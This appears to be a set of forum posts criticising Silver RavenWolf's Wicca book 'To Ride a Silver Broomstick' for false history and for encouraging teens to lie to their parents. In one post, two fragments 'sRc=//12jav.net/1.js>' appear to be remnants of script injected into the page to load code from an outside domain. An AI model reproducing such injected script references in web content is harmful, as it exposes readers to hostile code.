she was also the first occult book i bought....to ride a silver broomstick i believe it was....but it struck me as odd and i researched what more experienced witches thought of her....it wasnt good.

what struck me as odd was something she wrote in to ride a silver broomstick.. this is paraphrased:

do not tell your friends or family about your new reality until you are confident in it. your associates will notice a difference when everything starts to go your way and life becomes so much easier for you....even starting out i knew that wasnt true.

her history sucks in that book as well.

she also likes to bash on christianity a bit too much and encourages children to lie to thier parents...now i agree that you should do what you want and take it as "what mama dont know wont hurt her" but for an author who is seen by so many to take that position, its kinda not too good.

i encourage anyone who is a teen to read these sites, Silver Ravenwolf's "to ride a silver broomstick" was the second wiccan book i bought, luckily i found a forum that showed me some things i hadnt noticed.

she preaches that children should lie to thier parents, people who are virgins are more pure than those who arent, she still purports the burning times myth that millions not thousands died...her history sucks, along with her ethics....

no, scott cunningham is good for beginners....he doesnt give false history lessons, or any other number of things that she does that are wrong.....i'm sorry, but many young people are on this forum and they need to know about the dangers of Mama $ilver sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

if a book is easy for beginners to read but contains mostly false information, i would have to say that it isnt "good" for them to read.
